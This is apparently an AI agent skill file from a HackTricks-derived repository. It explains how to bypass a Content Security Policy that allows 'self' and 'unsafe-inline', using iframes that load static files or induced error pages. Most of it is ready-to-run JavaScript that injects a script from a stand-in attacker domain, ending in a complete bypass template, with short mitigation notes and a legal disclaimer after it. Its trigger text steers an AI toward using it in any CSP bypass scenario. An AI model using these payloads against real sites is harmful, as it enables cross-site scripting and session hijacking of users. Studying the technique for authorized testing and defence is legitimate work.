Hacktricks-skills csp-bypass-self-unsafe-inline
How to bypass Content Security Policy (CSP) when configured with 'self' and 'unsafe-inline'. Use this skill whenever you're doing web security testing, penetration testing, or analyzing CSP configurations that include 'unsafe-inline'. Trigger this skill for any CSP bypass scenario, iframe exploitation, or when you need to execute JavaScript in restricted environments. Also use when analyzing Content-Security-Policy headers, testing web application security, or when you encounter CSP headers like "default-src 'self' 'unsafe-inline'".
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes/SKILL.MDCSP Bypass: Self + Unsafe Inline with Iframes
This skill helps you bypass Content Security Policy (CSP) configurations that use
'self''unsafe-inline'Understanding the Vulnerability
A CSP configuration like:
Content-Security-Policy: default-src 'self' 'unsafe-inline';
What it allows:
- Content from the same origin (
)'self' - Inline scripts and styles (
)'unsafe-inline'
What it blocks:
- External scripts, styles, images, CSS, WebSockets
- Functions that execute code from strings:
,eval()
,setTimeout()
(due to missingsetInterval()
)'unsafe-eval'
Attack Vector 1: Via Text & Images
Modern browsers convert images and text files into HTML when displayed in iframes. These pages often lack CSP headers and X-Frame-Options, enabling arbitrary JavaScript execution.
Technique
- Load a static resource (CSS, image, text file) in an iframe
- The browser renders it as HTML without CSP
- Inject your malicious script into the iframe's document
Example Payload
// Create iframe pointing to a static resource var frame = document.createElement("iframe"); frame.src = "/css/bootstrap.min.css"; // or /favicon.ico, /robots.txt document.body.appendChild(frame); // Inject script into the iframe var script = document.createElement("script"); script.src = "//your-attacker-domain.com/csp-bypass.js"; window.frames[0].document.head.appendChild(script);
Target Resources to Try
/favicon.ico/robots.txt/css/*.css
or/images/*.png/images/*.jpg
(if accessible)/js/*.js- Any static file that returns 200 OK
Attack Vector 2: Via Error Pages
Error responses typically lack CSP headers and X-Frame-Options. You can induce errors to load in iframes and execute JavaScript.
Technique A: Path Traversal Error
// Induce nginx/apache error with path traversal var frame = document.createElement("iframe"); frame.src = "/%2e%2e%2f"; // ../ document.body.appendChild(frame); // Inject script after iframe loads setTimeout(function() { var script = document.createElement("script"); script.src = "//your-attacker-domain.com/csp-bypass.js"; window.frames[0].document.head.appendChild(script); }, 500);
Technique B: Long URL Error
// Trigger error with excessively long URL var frame = document.createElement("iframe"); frame.src = "/" + "A".repeat(20000); document.body.appendChild(frame); // Inject script setTimeout(function() { var script = document.createElement("script"); script.src = "//your-attacker-domain.com/csp-bypass.js"; window.frames[0].document.head.appendChild(script); }, 500);
Technique C: Cookie Overflow Error
// Generate error via extensive cookies for (var i = 0; i < 5; i++) { document.cookie = i + "=" + "a".repeat(4000); } var frame = document.createElement("iframe"); frame.src = "/"; document.body.appendChild(frame); // Inject script setTimeout(function() { var script = document.createElement("script"); script.src = "//your-attacker-domain.com/csp-bypass.js"; window.frames[0].document.head.appendChild(script); }, 500); // Clean up cookies after execution for (var i = 0; i < 5; i++) { document.cookie = i + "="; }
Complete Bypass Script Template
// CSP Bypass: Self + Unsafe Inline (function() { // Configuration var targetResource = "/favicon.ico"; // Change based on available resources var payloadUrl = "//your-attacker-domain.com/csp-bypass.js"; // Create iframe var frame = document.createElement("iframe"); frame.style.display = "none"; frame.src = targetResource; document.body.appendChild(frame); // Wait for iframe to load, then inject frame.onload = function() { try { var script = document.createElement("script"); script.src = payloadUrl; window.frames[0].document.head.appendChild(script); console.log("[+] CSP bypass payload injected"); } catch(e) { console.log("[-] CSP bypass failed:", e); } }; })();
Testing Checklist
When testing for this vulnerability:
- Check CSP Header: Confirm
or similardefault-src 'self' 'unsafe-inline' - Identify Static Resources: Find accessible CSS, images, or text files
- Test Error Pages: Verify error responses lack CSP headers
- Verify X-Frame-Options: Ensure target pages don't have
orX-Frame-Options: DENYSAMEORIGIN - Test Iframe Injection: Confirm you can create and manipulate iframes
- Validate Script Execution: Use a callback to your server to confirm payload execution
Detection & Mitigation
For Defenders
- Remove
from CSP'unsafe-inline' - Use nonces or hashes for inline scripts
- Add
orX-Frame-Options: DENYSAMEORIGIN - Include
in CSPframe-ancestors 'self' - Ensure error pages include proper CSP headers
- Monitor for iframe creation in browser console
For Testers
- Document all successful bypass vectors
- Include proof-of-concept code
- Note which resources were exploitable
- Report severity based on impact (XSS, session hijacking, etc.)
References
Legal & Ethical Notice
This skill is for authorized security testing only. Always obtain written permission before testing any system. Unauthorized access to computer systems is illegal and unethical.